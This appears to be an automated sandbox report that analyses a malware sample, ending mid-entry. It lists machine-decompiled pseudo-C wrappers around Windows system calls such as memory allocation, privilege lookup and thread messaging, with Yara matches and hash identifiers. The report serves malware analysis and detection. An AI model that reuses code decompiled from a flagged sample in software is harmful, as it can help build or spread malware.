                                              0x00419f47
                                              0x00419f69
                                              0x00419f6d

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: 57a60d12cdd3107e28f106b1c20d4efb5db4eaec23648d624b473dcbccaf1d29
                                              • Instruction ID: d44b2fcd7257f5c1653b47ae46f6d1669d22d9de41999ab8bed90fa00f96e8aa
                                              • Opcode Fuzzy Hash: 57a60d12cdd3107e28f106b1c20d4efb5db4eaec23648d624b473dcbccaf1d29
                                              • Instruction Fuzzy Hash: B2F015B2200118AFCB24DF99CC81EEB77A9EF88354F118649FE5DA7241C631E815CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00419F30, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00419F30(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A950(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                              0x00419f3f
                                              0x00419f47
                                              0x00419f69
                                              0x00419f6d

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                              • Instruction ID: c2721ea4e084a79d388e091216dcc94a475298a8aa449db6134383b78daf1f40
                                              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                              • Instruction Fuzzy Hash: 7DF015B2210208AFCB14DF89CC81EEB77ADAF88754F118549BE1897241C630F810CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00419E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00419E80(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a913
				E0041A950(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                              0x00419e83
                                              0x00419e86
                                              0x00419e8f
                                              0x00419e97
                                              0x00419ea5
                                              0x00419ea9

                                              APIs
                                              • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                              • Instruction ID: abd226b249efdbe90954a2e5a1f5a103ee35f8531edac2b51595525400ebd06d
                                              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                              • Instruction Fuzzy Hash: FED01776200214ABD710EB99CC86EE77BACEF48760F15449ABA5C9B242C530FA5086E0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01539910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 7ea5c1c758efe21882a5fc217a98d1bdf16a46fe80931d4291a0dfad1ac77b4c
                                              • Instruction ID: f471e46d2fa354ae5f24b43f96b202a45c32b4082553884684a30c0954c426f2
                                              • Opcode Fuzzy Hash: 7ea5c1c758efe21882a5fc217a98d1bdf16a46fe80931d4291a0dfad1ac77b4c
                                              • Instruction Fuzzy Hash: 839002B134100403D140719984047460055B7E0345F51C411A5054994EC6A98DD576A9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 015399A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 99ccf91e841bb360e60986dd85f106dce0524cb2aa123299131dda3b927ccc97
                                              • Instruction ID: 46c2399e16b9ff4c2de2fc44f5efef572c7cede6fca1981aea11fa20d5fede0a
                                              • Opcode Fuzzy Hash: 99ccf91e841bb360e60986dd85f106dce0524cb2aa123299131dda3b927ccc97
                                              • Instruction Fuzzy Hash: FA9002B138100443D10061998414B060055F7F1345F51C415E1054994DC669CC52716A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01539840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: c524796266aa01ec4b2c5ec6a9cbe7a8ab26e8a6a5fa070d7412839afa5e0fc5
                                              • Instruction ID: 415bd3f6d713f5341d8e86e46d33b0a7558e0b1bafa3eea558b49237534beb72
                                              • Opcode Fuzzy Hash: c524796266aa01ec4b2c5ec6a9cbe7a8ab26e8a6a5fa070d7412839afa5e0fc5
                                              • Instruction Fuzzy Hash: FA900271382041535545B19984045074056B7F0285791C412A1404D90CC5769856E665
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01539860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 625374357ffb2289a1f6eb0a9715a51acf9b4ede99363a59c865caf785476580
                                              • Instruction ID: 3b2345bf9e84859edfc2d44ead5183a1ebe146883b8cca013132c970fdb03248
                                              • Opcode Fuzzy Hash: 625374357ffb2289a1f6eb0a9715a51acf9b4ede99363a59c865caf785476580
                                              • Instruction Fuzzy Hash: 5B90027134100413D111619985047070059B7E0285F91C812A0414998DD6A68952B165
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 015398F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: db5a6a51b0e3b8ae7caa754f656b43d25052287938621aa4cfbfd867efcb0a71
                                              • Instruction ID: 57db0ebd1a43cf84bd45220da28c97dd7ea32b13a790df2e023d58e79e79d720
                                              • Opcode Fuzzy Hash: db5a6a51b0e3b8ae7caa754f656b43d25052287938621aa4cfbfd867efcb0a71
                                              • Instruction Fuzzy Hash: B890027174100503D10171998404616005AB7E0285F91C422A1014995ECA758992B175
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01539A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 0f36d5dfbd94b183a3a064320d232ec12fd1a0c359a2cd191db25ead2e2730f4
                                              • Instruction ID: 5110fb169fc0e595866c0f7e3413ff9a93e5b3336d7142be9f1fff76bc9df09c
                                              • Opcode Fuzzy Hash: 0f36d5dfbd94b183a3a064320d232ec12fd1a0c359a2cd191db25ead2e2730f4
                                              • Instruction Fuzzy Hash: 0690027135180043D20065A98C14B070055B7E0347F51C515A0144994CC96588616565
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01539A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: e06db7bcd7e126ab6e1b01debe1a3f2feecb934de6f0b20d417adbd25936ef7f
                                              • Instruction ID: 0899c533a13bc2b80d3f821d2573f1fdd13491c37b15c2e25c1f89a6232485ce
                                              • Opcode Fuzzy Hash: e06db7bcd7e126ab6e1b01debe1a3f2feecb934de6f0b20d417adbd25936ef7f
                                              • Instruction Fuzzy Hash: 6490027134140403D1006199881470B0055B7E0346F51C411A1154995DC675885175B5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01539A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 7222c1a9485df92ab7ccd1be66e24b329a81ed62d391190ff56f219b449a4db7
                                              • Instruction ID: c7477921868090ee97e7677c42a2d6db990ddbd782228020bfbf27e826269124
                                              • Opcode Fuzzy Hash: 7222c1a9485df92ab7ccd1be66e24b329a81ed62d391190ff56f219b449a4db7
                                              • Instruction Fuzzy Hash: 3990027174100043414071A9C8449064055BBF1255751C521A0988990DC5A9886566A9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01539540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 840f61bb10b1fde30eb498c8cec0942a1b66dbe94987ecf259df9bb031693be9
                                              • Instruction ID: b43ab69b8b9d496806c97802ce2b945d9b64d6b6e28770019004b467be80c563
                                              • Opcode Fuzzy Hash: 840f61bb10b1fde30eb498c8cec0942a1b66dbe94987ecf259df9bb031693be9
                                              • Instruction Fuzzy Hash: 96900275351000030105A59947045070096B7E5395351C421F1005990CD67188616165
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 015395D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 3474b2e30aec0dbf3bb93f8616f682111f6aba57de3ad1089232d2de4200ebea
                                              • Instruction ID: 8dc97516d175e0902fabc2dd855ff99c3ce4a7a247165b8493cd2b17016b8464
                                              • Opcode Fuzzy Hash: 3474b2e30aec0dbf3bb93f8616f682111f6aba57de3ad1089232d2de4200ebea
                                              • Instruction Fuzzy Hash: 8E9002B134200003410571998414616405AB7F0245B51C421E10049D0DC57588917169
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01539710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 74be897ed15520b742f3573a7153f8e7b9fc6a832627b3620527fd35171f5470
                                              • Instruction ID: 51638c284363a96e676553050b66b0acbf06adab9fa8215daa9a9e276be329cd
                                              • Opcode Fuzzy Hash: 74be897ed15520b742f3573a7153f8e7b9fc6a832627b3620527fd35171f5470
                                              • Instruction Fuzzy Hash: 0490027134100403D10065D994086460055B7F0345F51D411A5014995EC6B588917175
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01539780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: c300767cdf1f0b36b406abd8d79d2535c2e4fa1446cb269af7597f65b20a5fea
                                              • Instruction ID: ac1d21f2b55c31daed32af9c863652a642219723084c0bc89dbbea57409e97a5
                                              • Opcode Fuzzy Hash: c300767cdf1f0b36b406abd8d79d2535c2e4fa1446cb269af7597f65b20a5fea
                                              • Instruction Fuzzy Hash: 6990027935300003D1807199940860A0055B7E1246F91D815A0005998CC96588696365
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 015397A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: af08fabfba4cf3a0c06aff0eecb3d1e03381802bdfd9f2c71c5bac7de49c1f87
                                              • Instruction ID: 7b98af47b96ddd6bd19796cac01aeb7692c589544d3031005a01c7eb4e00fbe2
                                              • Opcode Fuzzy Hash: af08fabfba4cf3a0c06aff0eecb3d1e03381802bdfd9f2c71c5bac7de49c1f87
                                              • Instruction Fuzzy Hash: 4690027134100003D140719994186064055F7F1345F51D411E0404994CD96588566266
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01539660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 19ed19adecc379fb7ebbb305a735311d417de439fddb8d360f592567c874ea85
                                              • Instruction ID: e469065ce52eafd0e7e5a3296adc5bbf337a31b5059eb4428bb56840e0261350
                                              • Opcode Fuzzy Hash: 19ed19adecc379fb7ebbb305a735311d417de439fddb8d360f592567c874ea85
                                              • Instruction Fuzzy Hash: 0790027134100803D1807199840464A0055B7E1345F91C415A0015A94DCA658A5977E5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 015396E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 8b3e12a62361c5cea84d48ac81de2ea429ea26ec2cf167dac1e4236e7768c518
                                              • Instruction ID: 1596518cced12d739e9c3bf0800a8844e7b32ecc87dee8abc401435426db53f3
                                              • Opcode Fuzzy Hash: 8b3e12a62361c5cea84d48ac81de2ea429ea26ec2cf167dac1e4236e7768c518
                                              • Instruction Fuzzy Hash: 3890027134108803D1106199C40474A0055B7E0345F55C811A4414A98DC6E588917165
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00409A80, Relevance: .1, Instructions: 92COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                              • Instruction ID: 31b1220a7bfbfd16f43a3644c83f2c17606f0388dd956b3420c92d1797c928f5
                                              • Opcode Fuzzy Hash: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                              • Instruction Fuzzy Hash: 202137B2D4020857CB25DA64AD42AEF73BCAB54304F04007FE949A7182F63CBE49CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041A020, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0041A020(intOrPtr _a4, void* _a8, long _a12, char _a16) {
				void* _t10;
				void* _t15;

				E0041A950(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t4 =  &_a16; // 0x414c6f
				_t10 = RtlAllocateHeap(_a8, _a12,  *_t4); // executed
				return _t10;
			}





                                              0x0041a037
                                              0x0041a03c
                                              0x0041a04d
                                              0x0041a051

                                              APIs
                                              • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A04D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID: oLA
                                              • API String ID: 1279760036-3789366272
                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                              • Instruction ID: 3e9cccf5f91448adbf19cee7c08a6922c38dacc77a606dc9f5f43a2a80c29887
                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                              • Instruction Fuzzy Hash: 4BE012B1210208ABDB14EF99CC41EA777ACAF88664F118559BA185B242C630F9108AB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 82%
                                              			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				signed char _t15;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041B850( &_v67, 0, 0x3f);
				E0041C3F0( &_v68, 3);
				_t12 = E0040ACC0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E10(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					if(_t14 != 0) {
						L4:
						return _t14;
					}
					_t15 = E0040A450(1, 8);
					 *_t15 =  *_t15 + _t15;
					_t14 =  *_t25(_t21, 0x8003, _t26 + (_t15 & 0x000000ff) - 0x40, _t14);
					goto L4;
				}
				return _t13;
			}













                                              0x004082f0
                                              0x004082ff
                                              0x00408303
                                              0x0040830e
                                              0x0040831e
                                              0x0040832e
                                              0x00408333
                                              0x0040833a
                                              0x0040833d
                                              0x0040834a
                                              0x0040834e
                                              0x0040836d
                                              0x00000000
                                              0x0040836d
                                              0x00408355
                                              0x00408358
                                              0x0040836b
                                              0x00000000
                                              0x0040836b
                                              0x00408372

                                              APIs
                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              • Opcode ID: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                                              • Instruction ID: 7ca1aeaa7978e6d3a4d0f1b4208387e2518013786dff53ee4b69e84d93d23419
                                              • Opcode Fuzzy Hash: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                                              • Instruction Fuzzy Hash: 7301AC31A803187BE720A6959C43FFF775C6B40F54F05411DFF04BA1C1D6A9691546FA
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041A058, Relevance: 1.5, APIs: 1, Instructions: 34memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 27%
                                              			E0041A058(void* __eax, char _a4, void* _a8, long _a12, void* _a16) {
				intOrPtr _v64;
				void* __esi;
				intOrPtr* _t10;
				void* _t11;

				asm("les ebp, [esi-0x7c]");
				if(__eax != _v64) {
					return  *_t10(__eax, _t11);
				} else {
					__ebp = __esp;
					__eax = _a4;
					_t4 = __eax + 0xc74; // 0xc74
					__esi = _t4;
					__eax = _a12;
					__eax = RtlFreeHeap(_a8, _a12, _a16); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}







                                              0x0041a05b
                                              0x0041a05e
                                              0x0041a01d
                                              0x0041a060
                                              0x0041a061
                                              0x0041a063
                                              0x0041a06f
                                              0x0041a06f
                                              0x0041a07f
                                              0x0041a08d
                                              0x0041a08f
                                              0x0041a090
                                              0x0041a091
                                              0x0041a091

                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID:
                                              • API String ID: 3298025750-0
                                              • Opcode ID: 40fc32900011ca02ce5374520ee1a0d00daa4a530412a99ed337a96d828c0e8b
                                              • Instruction ID: f647fa4dae4cac5cf9ef4ef8b47ceec9c42aa7930bcfd581923cf5be44fa15a3
                                              • Opcode Fuzzy Hash: 40fc32900011ca02ce5374520ee1a0d00daa4a530412a99ed337a96d828c0e8b
                                              • Instruction Fuzzy Hash: C6F08CB26002086FDB14EFA8DC49EEB77ACEF88724F014559F94C57202D631E8158AF4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041A1B1, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E0041A1B1(void* __eax, void* __edx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t15;

				asm("sahf");
				asm("out 0x55, eax");
				_t12 = _a4;
				E0041A950(0x15ef25aa, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t12 + 0xa18)), 0, 0x46);
				_t15 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t15;
			}




                                              0x0041a1b4
                                              0x0041a1bf
                                              0x0041a1c3
                                              0x0041a1da
                                              0x0041a1f0
                                              0x0041a1f4

                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: b6578d576140d20fea9fa6fb0c7c0a2727124c170d9a185f48b2f3614d6887e2
                                              • Instruction ID: d24d334f68a5d6747d99ad2bc04790cbec4e62017788678676bf4aba357ec5f9
                                              • Opcode Fuzzy Hash: b6578d576140d20fea9fa6fb0c7c0a2727124c170d9a185f48b2f3614d6887e2
                                              • Instruction Fuzzy Hash: 11F0A0B16002046FCB10DF94CC49FD777A9AF88620F014196BD485B241CA30A8518BF2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041A092, Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 30%
                                              			E0041A092(intOrPtr _a12, int _a16) {
				void* _t6;
				void* _t17;

				asm("out 0x22, eax");
				_t17 = _t6;
				_pop(ds);
				asm("scasb");
				asm("std");
				asm("enter 0xc332, 0x55");
				_t8 = _a12;
				E0041A950(_t17, _a12, _a12 + 0xc7c,  *((intOrPtr*)(_t8 + 0xa14)), 0, 0x36);
				ExitProcess(_a16);
			}





                                              0x0041a094
                                              0x0041a099
                                              0x0041a09a
                                              0x0041a09b
                                              0x0041a09c
                                              0x0041a09d
                                              0x0041a0a3
                                              0x0041a0ba
                                              0x0041a0c8

                                              APIs
                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: 38b6fb3e9cecde7c245970dd728bceabd1618dafca1840eb1295c99724670de0
                                              • Instruction ID: 64515f485ef197f860f464cc83ec5c44d4eb59798f00150f0af301bceb5f27ea
                                              • Opcode Fuzzy Hash: 38b6fb3e9cecde7c245970dd728bceabd1618dafca1840eb1295c99724670de0
                                              • Instruction Fuzzy Hash: 93E026312402107FCB20CF64CC85FC73BA8CB4C390F148025F9686B382C130E60486E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041A060, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0041A060(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A950(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                              0x0041a06f
                                              0x0041a077
                                              0x0041a08d
                                              0x0041a091

                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID:
                                              • API String ID: 3298025750-0
                                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                              • Instruction ID: 52797000195eaed384c72aa9dcce9225c0ea881c405841437723114bb70c3a82
                                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                              • Instruction Fuzzy Hash: AEE012B1210208ABDB18EF99CC49EA777ACAF88760F018559BA185B242C630E9108AB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041A1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0041A1C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041A950(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                              0x0041a1da
                                              0x0041a1f0
                                              0x0041a1f4

                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                              • Instruction ID: 2f72ad50c13f3bcf2c9af244d49b542148f264c451808f1d297bb805e18cb808
